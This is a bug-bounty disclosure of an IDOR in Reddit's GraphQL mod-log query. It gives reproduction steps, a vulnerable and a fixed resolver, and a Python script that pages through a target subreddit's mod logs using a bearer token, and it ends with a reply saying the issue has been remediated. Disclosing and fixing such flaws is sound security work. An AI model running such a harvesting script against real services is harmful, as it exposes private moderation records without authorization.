Obtaining mod records using the IDOR vulnerability from any public or private subreddit | BUG BOUNTY
I am System.Exit
What Is IDOR?
In a web application, the requests a user sends to the server and the responses it returns carry HTTP parameters such as "id", "uid" or "pid" whose values identify the objects that user has been assigned. An attacker can read these values in URLs, cookies, request headers or packet captures and then tamper with them. If the server trusts the submitted value without checking that the caller is actually authorized for that object, the tampering yields an Insecure Direct Object Reference (IDOR).
Summary:
The mod-log query on gql.reddit.com, addressed by its operation id, does not check whether the caller is a moderator of the subreddit it asks about. Changing the subredditName variable to any target subreddit, public or restricted, returns that subreddit's mod logs to the attacker.
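To make the missing check concrete, here is an added example (not Reddit's code) of a minimal mod-log resolver written once in the vulnerable shape the summary describes and once with the server-side moderator check that fixes it. The subreddit names, user names, data structures and the Forbidden exception are all assumptions made for this illustration.

```python
# Added illustration, not Reddit's implementation: a mod-log resolver with and
# without the authorization check. Names and data below are constructed.

class Forbidden(Exception):
    """Raised when the caller may not read the requested mod log."""


# Constructed sample data: who moderates which subreddit, and each mod log.
MODERATORS = {
    "targetsub": {"alice"},
    "attackersub": {"mallory"},
}
MOD_LOGS = {
    "targetsub": [{"action": "removelink", "mod": "alice", "target": "t3_abc"}],
    "attackersub": [{"action": "banuser", "mod": "mallory", "target": "eve"}],
}


def mod_log_vulnerable(caller, subreddit_name):
    """Vulnerable shape: only verifies that the caller is logged in, then
    trusts the client-supplied subredditName. Any authenticated account can
    read any subreddit's mod log, which is the IDOR."""
    if caller is None:
        raise Forbidden("login required")
    return MOD_LOGS.get(subreddit_name, [])


def is_moderator(caller, subreddit_name):
    """Authorization decision made from server-side state only."""
    return caller in MODERATORS.get(subreddit_name, set())


def mod_log_fixed(caller, subreddit_name):
    """Hardened shape: the caller's identity is checked against the
    requested object, not against anything the client asserts. Unknown
    subreddits and non-moderators get the same error so the endpoint does
    not reveal which names exist."""
    if caller is None or not is_moderator(caller, subreddit_name):
        raise Forbidden("not a moderator of this subreddit")
    return MOD_LOGS[subreddit_name]


def is_denied(resolver, caller, subreddit_name):
    """True if the resolver refuses the request; used to compare the two."""
    try:
        resolver(caller, subreddit_name)
    except Forbidden:
        return True
    return False
```

The key point is that the fix does not live in the client, the cursor or the operation id: the resolver must derive the authorization decision from the caller's session and the object being requested, and the same check must apply to every page of the result, not only the first.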
Steps To Reproduce:
- Log in to any account as the attacker and obtain its authorization token.
- Send the request given below to gql.reddit.com.
- The response contains only one page of logs. Check the value of hasNextPage in the response: if it is false, there are no more logs beyond the ones returned.
- If it is true, there are more logs. Fetch them by adding a new variable, after, set to the value of endCursor from the response body of the previous request.
After sending that request we get the second page of logs. If hasNextPage is still true, repeat with the new endCursor until a response has hasNextPage set to false; this walks through every page of mod logs one by one.
The output is stored in mod_log_out.txt in the same directory.
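The steps above describe cursor pagination: follow endCursor while hasNextPage is true. The following is an added example of that loop, written for this page and not the reporter's script. Only subredditName, after, hasNextPage, endCursor and the output file name come from the write-up; the operation id placeholder, the request body layout, the response nesting (data.subredditInfoByName.modLog with edges and pageInfo) and the offline fake backend are assumptions so the loop can be run without network access.

```python
# Added example, not the reporter's script. Walks a cursor-paginated mod-log
# response as the steps describe and writes the entries to mod_log_out.txt.
# OPERATION_ID, the request body layout and the response nesting are assumed.
import json

GQL_URL = "https://gql.reddit.com/"
OPERATION_ID = "<operation id from the original request>"  # placeholder only


def build_request(subreddit_name, after=None):
    """Body for one page; 'after' carries the previous page's endCursor."""
    variables = {"subredditName": subreddit_name}
    if after is not None:
        variables["after"] = after
    return {"operationId": OPERATION_ID, "variables": variables}


def harvest_mod_log(send, subreddit_name, max_pages=1000):
    """send(body) -> parsed JSON. Collects every page until hasNextPage is
    false. max_pages guards against a server that never reports the end."""
    entries, after = [], None
    for _ in range(max_pages):
        resp = send(build_request(subreddit_name, after))
        mod_log = resp["data"]["subredditInfoByName"]["modLog"]  # assumed nesting
        entries.extend(edge["node"] for edge in mod_log["edges"])
        page = mod_log["pageInfo"]
        if not page["hasNextPage"]:
            return entries
        after = page["endCursor"]
    raise RuntimeError("pagination did not terminate within max_pages")


def save_entries(entries, path="mod_log_out.txt"):
    """One JSON object per line; returns the number of lines written."""
    with open(path, "w") as fh:
        for entry in entries:
            fh.write(json.dumps(entry) + "\n")
    return len(entries)


# Constructed fake backend: three pages of two entries each, keyed by the
# 'after' cursor the client sends, so the loop can be exercised offline.
FAKE_PAGES = {
    None: ([{"id": 1}, {"id": 2}], True, "cursor-A"),
    "cursor-A": ([{"id": 3}, {"id": 4}], True, "cursor-B"),
    "cursor-B": ([{"id": 5}, {"id": 6}], False, None),
}


def fake_send(body):
    nodes, has_next, end_cursor = FAKE_PAGES[body["variables"].get("after")]
    return {"data": {"subredditInfoByName": {"modLog": {
        "edges": [{"node": n} for n in nodes],
        "pageInfo": {"hasNextPage": has_next, "endCursor": end_cursor},
    }}}}


def live_send(token):
    """Builds a send() that posts to gql.reddit.com with a bearer token.
    Not exercised here; only use it against accounts and subreddits you are
    authorized to test, and note the original issue is reported as fixed."""
    import urllib.request

    def send(body):
        req = urllib.request.Request(
            GQL_URL, data=json.dumps(body).encode(),
            headers={"Authorization": "Bearer " + token,
                     "Content-Type": "application/json"})
        with urllib.request.urlopen(req) as r:
            return json.load(r)
    return send


if __name__ == "__main__":
    print(save_entries(harvest_mod_log(fake_send, "targetsub")))
```

The loop terminates on hasNextPage being false, exactly as the steps describe, and the max_pages bound is the one caveat a practitioner should add: a paginated endpoint that keeps returning a cursor will otherwise run forever.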
Thanks for your research, @high_ping_ninja. There is an initial remediation in place, and we believe the repro steps are no longer functional.